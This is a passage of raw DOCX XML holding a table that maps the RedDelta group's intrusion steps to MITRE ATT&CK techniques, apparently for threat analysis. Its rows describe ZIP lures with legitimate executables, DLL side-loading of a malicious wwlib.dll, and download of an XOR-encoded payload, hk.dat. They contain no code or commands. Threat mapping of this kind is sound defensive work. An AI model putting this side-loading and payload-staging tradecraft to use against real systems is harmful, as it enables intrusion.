            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33895AC1" w14:textId="2B965C01" w:rsidR="00CC5907" w:rsidRPr="00CC5907" w:rsidRDefault="00185D3E" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>RedDelta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> used ZIP files containing legitimate executables masquerading as lure documents</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B14585" w:rsidRPr="00B857D7" w14:paraId="07649132" w14:textId="77777777" w:rsidTr="007D27AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08192E0A" w14:textId="31AD9898" w:rsidR="00B14585" w:rsidRPr="00B857D7" w:rsidRDefault="00CC5907" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4907F52C" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="00B857D7" w:rsidRDefault="00B14585" w:rsidP="00473869">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818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51557406" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="00B857D7" w:rsidRDefault="00B14585" w:rsidP="00473869">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1" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5650D841" w14:textId="41EBEA4C" w:rsidR="00B14585" w:rsidRPr="00B857D7" w:rsidRDefault="001D7291" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="768519CA" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="00B857D7" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B3B54F7" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="00B857D7" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E3767DD" w14:textId="4CB9DE10" w:rsidR="00B14585" w:rsidRPr="00B857D7" w:rsidRDefault="00992EC7" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E9864ED" w14:textId="4D60B459" w:rsidR="00B14585" w:rsidRPr="001D7291" w:rsidRDefault="001D7291" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D7291">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>In [1] it is not explicitly stated but assuming that target opens zip and lure ‘</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001D7291">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>documents’</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001D7291">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>. See below</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD7ABE" w:rsidRPr="00B857D7" w14:paraId="54AE417F" w14:textId="77777777" w:rsidTr="007D27AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5916BEC1" w14:textId="5BF3952B" w:rsidR="00FD7ABE" w:rsidRDefault="00FD7ABE" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58A0D7B7" w14:textId="6DB88C84" w:rsidR="00FD7ABE" w:rsidRPr="00B857D7" w:rsidRDefault="00FD7ABE" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FD7ABE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00FD7ABE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00FD7ABE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FD7ABE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FD7ABE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D806D02" w14:textId="4E90619B" w:rsidR="00FD7ABE" w:rsidRPr="00B857D7" w:rsidRDefault="00FD7ABE" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FD7ABE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1574.002 Hijack Execution Flow: DLL Side-Loading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32E2C44A" w14:textId="209ECCEA" w:rsidR="00FD7ABE" w:rsidRDefault="00FF4416" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40910733" w14:textId="77777777" w:rsidR="00FD7ABE" w:rsidRPr="00B857D7" w:rsidRDefault="00FD7ABE" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16CE11D6" w14:textId="502117E7" w:rsidR="00FD7ABE" w:rsidRDefault="00FF4416" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A8EFE34" w14:textId="763108F1" w:rsidR="00FD7ABE" w:rsidRPr="00B857D7" w:rsidRDefault="00992EC7" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV/</w:t>
            </w:r>
            <w:r w:rsidR="00B42656">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>P-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ABB0B52" w14:textId="4E9A4E96" w:rsidR="00FD7ABE" w:rsidRPr="001D7291" w:rsidRDefault="00FD7ABE" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D7291">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] This legitimate executable is used to load a malicious DLL also present within the ZIP file through DLL sideloading, before the target is shown a decoy document</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B34D84" w:rsidRPr="00B857D7" w14:paraId="512AFF11" w14:textId="77777777" w:rsidTr="007D27AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E9A2CDB" w14:textId="3EFA9D62" w:rsidR="00B34D84" w:rsidRDefault="00B34D84" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BB78216" w14:textId="3F8A7D6D" w:rsidR="00B34D84" w:rsidRPr="00B857D7" w:rsidRDefault="00B34D84" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B34D84">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B34D84">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B34D84">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A064621" w14:textId="563BFB5F" w:rsidR="00B34D84" w:rsidRPr="00B857D7" w:rsidRDefault="00B34D84" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B34D84">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B34D84">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1105 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B34D84">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DBD4C6A" w14:textId="69CA9484" w:rsidR="00B34D84" w:rsidRDefault="002659B6" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32292B9E" w14:textId="77777777" w:rsidR="00B34D84" w:rsidRPr="00B857D7" w:rsidRDefault="00B34D84" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="707B0D35" w14:textId="50F27700" w:rsidR="00B34D84" w:rsidRDefault="00DA24A4" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BB6AF07" w14:textId="6E7EA8D5" w:rsidR="00B34D84" w:rsidRPr="00B857D7" w:rsidRDefault="00992EC7" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A657449" w14:textId="59D49DDA" w:rsidR="00B34D84" w:rsidRPr="00B857D7" w:rsidRDefault="002659B6" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="002659B6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Wwlib.dll initializes the loading stage by downloading, decoding, and executing an XOR-encoded Windows executable file, hk.dat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00704ECD" w:rsidRPr="00B857D7" w14:paraId="785C5B65" w14:textId="77777777" w:rsidTr="007D27AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B4CB5BC" w14:textId="6A8A2676" w:rsidR="00704ECD" w:rsidRDefault="00DA24A4" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08E4C3FE" w14:textId="7C527E0E" w:rsidR="00704ECD" w:rsidRPr="00B857D7" w:rsidRDefault="00DA24A4" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA24A4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DA24A4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DA24A4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DA24A4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DA24A4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B3FA0D1" w14:textId="5082B868" w:rsidR="00704ECD" w:rsidRPr="00B857D7" w:rsidRDefault="00DA24A4" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA24A4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DA24A4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1027 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DA24A4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63095EF2" w14:textId="0B27C814" w:rsidR="00704ECD" w:rsidRDefault="006D06C1" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="798C4EC4" w14:textId="77777777" w:rsidR="00704ECD" w:rsidRPr="00B857D7" w:rsidRDefault="00704ECD" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16B6A1C7" w14:textId="58F0061F" w:rsidR="00704ECD" w:rsidRDefault="006D06C1" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77690A69" w14:textId="0BA65255" w:rsidR="00704ECD" w:rsidRPr="00B857D7" w:rsidRDefault="00992EC7" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13C1440D" w14:textId="4F46CF43" w:rsidR="00704ECD" w:rsidRPr="00B857D7" w:rsidRDefault="00DA24A4" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>As above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0076617D" w:rsidRPr="0076617D" w14:paraId="1A1AA8EB" w14:textId="77777777" w:rsidTr="007D27AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FADB3E7" w14:textId="0EA92116" w:rsidR="00DA24A4" w:rsidRPr="0076617D" w:rsidRDefault="004F08FA" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15DB5E3E" w14:textId="52996F1B" w:rsidR="00DA24A4" w:rsidRPr="0076617D" w:rsidRDefault="004F08FA" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
